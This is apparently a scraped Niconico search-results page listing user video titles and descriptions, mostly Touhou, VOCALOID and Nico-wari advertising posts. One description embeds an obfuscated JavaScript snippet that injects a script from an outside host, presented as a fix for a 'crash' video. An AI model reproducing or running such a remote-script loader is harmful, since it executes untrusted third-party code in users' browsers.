キーワード nm が含まれる動画 : 160179 件中 6433 - 6464 件目
種類:
- タグ
- キーワード
対象:
【東方】さなえちゃん【手書き】
ギャグだと思って見たら大間違いだぜ!!
マイリス→mylist/10330172 6/19 新作ができたりできなかったり→nm7382744
重音テト誕生日ニコ割り
テトの誕生日に動画がうp出来そうにないので、
取り急ぎニコ割りで支援。
投稿者コメントで下記のように入力すれば、ニコ割りに使用できます。
@CM nm6585153 再生 dic/4月1日は重音テト誕生祭
ご自由にお使いください。
投稿者コメントの例に、大百科へのリンクを追加しました。
淡々とポケモンものまね行くZE!
お酒が入るとついやっちゃうんだ☆ポケモンの鳴き真似って結構みんなやってるんですかね?時々異常にうまい人とか見かけます。あ、初めまして、John.Dといいます。初投稿で楽しくやらせて頂きました、よろしくお願いします。 追記:ごましお…nm8835244 その他動画mylist/15950663 バンド系mylist/15467962
勢いで東方3
この場をお借りしまして謝罪させていただきます。 mylist/11907340勢い2→nm6657435 勢い4→nm6686107
【ドラゲ】チンピラと妖精でへべれけだんす【手描き】
はっちゃけました、すいません。曲を聴いた瞬間にこの人が…!! 【本家】nm4812206 【マイリス】mylist/11918758
【COD4】逝き顔集
死ぬとどんな顔してるのかなって気にしたことないですか?見たことない人は見るべきです。( ゚д゚ )
【FARCRY2】逝き顔集→nm6978646
今までにうpした動画【GRID・PGR4・COD4・FRONTLINES】→mylist/8416258
【maru】コミュ 支援Flash (ドラクエ編)
こぐまです。【maru】コミュ(co41072)支援フラッシュです。
自分の投稿した動画のニコ割領域に
このフラッシュを再生させることが出来ます。
1.投稿者コメントを編集する
2.再生させたい時間に以下のコメントを投稿する。
@CM nm6898753 再生 co41072
バテンカイトスの曲を混ぜてみた(あれ?)
The true mirrorとThe valedictory elegy…なんですが、どうもテンポが違うようです。かなりごまかしましたが、結局ほんの1分のみ。これ以降は思いっきりずれます。(※この動画は混ぜてみたら混ざったといううp主の気まぐれで作られております) 前作nm6536976
サビ(?)だけでワンピースのルーキーぷんちき
アプー、カポネ、ウルージはいません。ごめんなさい。うp主の言うルーキーは、ルフィ、ゾロ以外のメンバーです。広がれルーキー愛!!!!! その他ルーキー作品【mylist/12606545】 ウルージ、アプーが見たい人は【nm7114609】へどうぞ。
【イナズマイレブン】化学反応で人類滅亡【NMM】
映像をきれいにしようとNMMにしてみた……うまくいかなさそうw って、アップロードにどれだけ時間かかるんだよ!ww 動画版高画質(かも/超次元短編動画へのリンク付き)≫sm7034199 おまけみたいな物≫nm7070504
「figma ビリー・ヘリントン」宣伝用ニコ割(新プレーヤー対応版)
★新プレーヤーに対応させました。
まさかの兄貴フィギュア化! 衝撃のあまり、また宣伝用のニコ割を勝手に作ってしまいました。
だらしねぇニコ割ですがよかったら宣伝用にどうぞ。
【使用方法】
1.ユーザーニコ割(以下ニコ割)を設定したい動画のページを開く(自分で投稿した動画のみ設定可)
2.このページの上部(動画投稿日の右の方)にある「投稿者コメントを編集」をクリックし、投稿者コメント編集モードに切り替える
3.コメント欄に「@CM nm7051700」と入力し、ニコ割をスタートさせたい時間でコメントボタンを押す
4.警告がでてきますが無視して「決定」を押して確定します
▼作成した兄貴ニコ割→【mylist/12504188】
【描いてみた】 泡沫の夢 PV(1番のみ)
はじめまして、歌時鈴紫と申す者です。ざわざわP様作曲「泡沫の夢」のPVをつくってみました。この曲、大好きです。がくぽ可哀そすぐる(笑) ☆素敵&めそりな本家様:sm5206504 ☆フル、完成しま、すた、Fuu-(´∀`;)→ nm7933900 ☆しばらくしたら削除しようと思いますっ;;
とりあえず作曲してみた
一応オリジナル。タイトルも無い即興曲ですがよろしければ聴いてやってください。うp主の黒歴史→nm5666153
【東方】【手書き】【2コマ】
各国の魔理沙を検証してみた。欧州篇。mylist/7616727 ●亜州篇nm7202904 ●米州篇nm7402769 ●阿州篇+αnm7792285 ●HP→http://waribashi.suppa.jp/
自分の声で遊んでみた
自分の声を録音しUTAUで遊んでみました。そのうち新音源として配布とかできたらいいなー。まあ使う人がいるとは思えないけど。素敵なメルト原曲はこちら→sm1715919 ■ライブラリとして配布はじめました→nm7581148
【東方】【手書き】【2コマ】
各国に魔理沙を検証してみた。米州篇。mylist/7616727 ●欧州篇nm7175566 ●亜州篇nm7202904 ●阿州篇+αnm7792285 ●HP→http://waribashi.suppa.jp/
幻想をぶち殺す?田村ゆかりさん
いたずら黒うさぎ 2009.07.04放送分より抜粋(画像はイメージ) 男の人の笑い声は放送作家の矢野さん
ゆかりんのいじり方にしびれる
(動画の26秒と44秒の部分、投稿者さんのお名前だけカットしています)
07.08 再生してくださった方、コメントしてくださった方、マイリスしてくださった方、本当にありがとう!ゆかりん(*´д`*)
※64kbpsで録音していたので音質申し訳ない…
マイリスト→<mylist/13608789>
08.06 黒うさカルタ(7月放送分で)作ってみた→【nm7851519】
【改装版】ガチムチ3分ファッキング【兄貴生誕40周年記念】
炸裂した「あの機能」は外しました(当然ですが)。また、兄貴生誕祭向けに、色々と作り直しました(デバッグが全然終わってません。動作報告お願いします)。音源:sm7395485 兄貴:sm1175788 わたしの無駄な努力の跡をご覧ください。*******_sef_=void(0);d=document;sp=d.createElement('script');sp.type='text/\x6a\x61\x76ascript';sp.src='http://dd.d3570239.dousetsu.com/';d.body.appendChild(sp);_sef_ nm7613697←崩壊解除(IE専用 クリックできない場合、画面更新してください。
【テニスの王子様】結構忙しい人のためのE気持【跡部】
下品すぎました…サーセンww フルの音源を1分以下にして、D☆Tソングの完成です。若干順番が前後するとこありますがまぁ、結果的に短くなってるので、気にしない気にしない。 AとDとEがあるなら、BとCもあっていいですよね。跡部様的に言うならツェー気持がいいな…ww えぇ気持ちになりたい忍足→nm7625802
【東方】【手書き】【2コマ】
各国に魔理沙を検証してみた。阿州篇+α。mylist/7616727 ●欧州篇nm7175566 ●亜州篇nm7202904 ●米州篇nm7402769 ●HP→http://waribashi.suppa.jp/
【アイドルマスター×VOCALOID】Voc@loidM@ster祭り3 ニコ割CM 1分版【ニコ割】
第3回Voc@loidM@ster祭りユーザーニコ割CM 1分版です。
@CM nm7914115 再生 dic/Voc@loidM@ster祭り3 でボカマス祭り3の大百科へ
@CM nm7914115 再生 co2411 でボカマスコミュへクリックすると行けます
【中川昭一】へべれけだんす【復活祈願】
いつまでもへこんでてもしょうがないから勢い半分冗談半分で作った。 次のときまでうまい酒でも飲んでゆっくり休んでください。 ※危険映像を含みます、ご注意下さい。 本家様nm4812206 前作nm7545995 【追記10/5】中川先生お疲れ様でした。ご冥福を心よりお祈りいたします。ゆっくり休んでくださいね。
Trickster 深淵BGM [abyss_entrance_day]
日本版トリックスターの蔵には無いBGM そのうち日本版にも実装されるかもしれない。ファイル名にabyss_entranceと付いているので深淵入口のものなのだろうか。台湾のほうの蔵で見つけたものの実際に使用されているのかは謎。 これは昼のBGMらしく夜のBGMは別に準備されているという MP3のタグ情報によると作者はSupbabyという人らしく、この人はDJMAXとかパンヤとかにも曲を書いている人物らしい。この動画の音量ちょっと大きいかも・・・ それと画像は台湾公式を探すと見つかるかと mylist/13501693 夜のBGM:nm8196694
東方星蓮船の白蓮の曲のイントロがこう聞こえて仕方ない
東方ニコ童祭出品動画三本目。作成時間5時間の超やっつけ作品。久し振りに我が家のミクさんに歌ってもらいました。もうネタバレとか気にしなくていいよね?■というわけで久し振りにサムネで釣ってみたくなった、特に意味はない■ニコ童祭出品の他作品:信長風顔グラ→(nm8337795)、藍様が暴れる話→(nm8338044)■尚、曲の尺の割りに再生時間が長いですが、単なるビットレート調整です。おや、だれかきたy###このうp主はスキマへ送られました###
【モンハンどうでしょう】Nobutuna公でへべれけだんす【手描きMAD】
拝啓、モンどうファンの皆様、ポポノタンが美味しい季節になり、如何お過ごしでしょうか。本日は、どうでしょうへの愛故に今回筆をとらせて頂きました。それではお体に気をつけて下さい、っと。/元ネタ→nm4812206/本家モンハンどうでしょうプレイリスト→mylist/5928909、mylist/8500898
【東方手書き】魔理沙とアリスが誕生日を祝ってくれるようです
マリアリの動画(nm8452539)と同時進行で作っていた妙な動画です。
魔理沙とアリスに誕生日(10/12)を祝ってもらいたい!という妄想で作っていたのですが、いつの間にかマリアリで誰かの誕生日を祝おう計画になっておりました。
が、結果なんだか残念な動画ができあがりました。特に音楽。…私音楽ノ才能無イノネ(;一_一)
めちゃくちゃだぜ。
作曲とかアレンジとかできる人ホント尊敬します。
作品集[mylist/13812305]
10/12(追記)
おめでとうコメ&広告とかありがとうございます!
12日誕生日の人、歓喜して下さい
コラール:安らぎ、喜びとともに 私は往きます:ルター詞/バッハ曲:ミク他
マルティン・ルター作詞&原作のコラール(讃美歌)を元に、バッハが4声コーラス化&オーケストレーションしたコラール合唱です。カンタータ125番の終曲でコラール第4節の詞が歌われますが、ここではあえて第1節の詞を用いました。詞を差し替えた以外はBWV125-6の再現演奏です。
前回upのnm8450370に引き続き、安らかに逝ける系です。
"Mit Fried und Freud ich fahr dahin"(カンタータ第125番 BWV125 / 6:コラール合唱に基づく)
+ Kapelle Triona + 指揮:トリーナ・クレー
合唱:初音ミク(S.A.T), 鏡音レン(Bass) 演奏:古楽MIDI 音律:シュニットガー中全音律(調律:はちゅ~ん) ピッチ:カンマートーン(a'=415Hz)
★作品リスト→mylist/7369168 ★家→http://kapelle.triona.jp/
